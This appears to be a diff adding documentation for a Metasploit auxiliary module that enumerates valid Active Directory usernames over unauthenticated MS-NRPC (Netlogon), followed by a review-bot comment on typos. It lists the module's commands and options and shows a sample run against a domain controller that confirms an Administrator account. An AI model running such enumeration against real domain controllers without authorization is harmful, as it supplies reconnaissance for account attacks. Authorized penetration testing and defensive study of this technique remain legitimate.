|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +A new method for gathering domain users. The method leverages auth-level = 1 (No authentication) against the |
| 4 | +MS-NRPC (Netlogon) interface on domain controllers. All that's required is the domain controller's IP address, |
| 5 | +and the entire process can be completed without providing any credentials. |
| 6 | + |
| 7 | +## Verification Steps |
| 8 | + |
| 9 | +1. Do: `use auxiliary/gather/nrpc_enumusers` |
| 10 | +2. Do: `set RHOSTS <targer IP addresses>` |
| 11 | +3. Do: `set USER_FILE <path to your users list>` |
| 12 | +4. Do: `run` |
| 13 | + |
| 14 | + |
| 15 | +## Target |
| 16 | + |
| 17 | +To use nrpc_enumusers, make sure you are able to connect to the Domain Controller. |
| 18 | +It has been tested with Windows servers 2012, 2016, 2019 and 2022 |
| 19 | + |
| 20 | +## Options |
| 21 | + |
| 22 | +1- `USER_FILE` (required) |
| 23 | + |
| 24 | +**Description:** Path to the file containing the list of usernames to enumerate. Each username should be on a separate line. |
| 25 | + |
| 26 | +**Usage:** Provide the path to the file that contains the list of user accounts you want to test. |
| 27 | + |
| 28 | +**Example:** `set USER_FILE /path/to/usernames.txt` |
| 29 | + |
| 30 | +2- `RHOSTS` (required) |
| 31 | + |
| 32 | +**Description:** The target IP address or range of IP addresses of the Domain Controllers. |
| 33 | + |
| 34 | +**Usage:** Specify the IP address or addresses of the Domain Controllers you are targeting. |
| 35 | + |
| 36 | +**Example:** `set RHOSTS 192.168.1.100` |
| 37 | + |
| 38 | +3- `RPORT` (optional) |
| 39 | + |
| 40 | +**Description:** The port for the MS-NRPC interface. If not specified, the module will attempt to determine the endpoint. |
| 41 | + |
| 42 | +**Usage:** If you know the port used by the MS-NRPC interface, you can specify it. Otherwise, the module will find it automatically. |
| 43 | + |
| 44 | +**Example:** `set RPORT 49664` |
| 45 | + |
| 46 | +## Scenarios |
| 47 | + |
| 48 | +The following demonstrates basic usage, using a custom wordlist, |
| 49 | +targeting a single Domain Controller to identify valid domain user accounts. |
| 50 | + |
| 51 | +Create a new `./users.txt` file, then run the module: |
| 52 | + |
| 53 | +``` |
| 54 | +msf6 auxiliary(gather/nrpc_enumusers) > set RHOSTS 192.168.177.177 |
| 55 | +RHOSTS => 192.168.177.177 |
| 56 | +msf6 auxiliary(gather/nrpc_enumusers) > set USER_FILE users.txt |
| 57 | +USER_FILE => users.txt |
| 58 | +msf6 auxiliary(gather/nrpc_enumusers) > run |
| 59 | +
|
| 60 | +[*] 192.168.177.177: - Connecting to the endpoint mapper service... |
| 61 | +[*] 192.168.177.177: - Binding to 12345678-1234-abcd-ef00-01234567cffb:1.0@ncacn_ip_tcp:192.168.177.177[49664]... |
| 62 | +[-] 192.168.177.177: - Tiffany.Molina does not exist |
| 63 | +[-] 192.168.177.177: - SMITH does not exist |
| 64 | +[-] 192.168.177.177: - JOHNSON does not exist |
| 65 | +[-] 192.168.177.177: - WILLIAMS does not exist |
| 66 | +[-] 192.168.177.177: - Administratorsvc_ldap does not exist |
| 67 | +[-] 192.168.177.177: - svc_ldap does not exist |
| 68 | +[-] 192.168.177.177: - ksimpson does not exist |
| 69 | +[+] 192.168.177.177: - Administrator exists |
| 70 | +[-] 192.168.177.177: - James does not exist |
| 71 | +[-] 192.168.177.177: - nikk37 does not exist |
| 72 | +[-] 192.168.177.177: - svc-printer does not exist |
| 73 | +[-] 192.168.177.177: - SABatchJobs does not exist |
| 74 | +[-] 192.168.177.177: - e.black does not exist |
| 75 | +[-] 192.168.177.177: - Kaorz does not exist |
| 76 | +[*] 192.168.177.177: - Scanned 1 of 1 hosts (100% complete) |
| 77 | +[*] Auxiliary module execution completed |
| 78 | +msf6 auxiliary(gather/nrpc_enumusers) > |
| 79 | +``` |
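Review bot: line 10 of the new file misspells the placeholder in `set RHOSTS <targer IP addresses>`; it should read `set RHOSTS <target IP addresses>`. The Verification Steps also stop at `run` without saying what success looks like; add a final step such as "Verify that valid accounts are reported as `[+] <host>: - <user> exists`" so a tester knows when the module has worked. In the Scenarios section the sample output contains `Administratorsvc_ldap does not exist`, which looks like two wordlist entries (`Administrator` and `svc_ldap`) run together, most likely a missing line break in the sample `users.txt`; the text tells the reader to create that file but never shows its contents, so a short listing of the expected `users.txt` (one username per line, as the USER_FILE description requires) would make the example reproducible and would have made that defect visible. Minor style points: the Options section uses `1-`, `2-`, `3-` as list markers where the rest of the document uses standard markdown numbered lists, and line 18 should read "It has been tested with Windows Server 2012, 2016, 2019 and 2022." with the product name capitalised consistently and a trailing period.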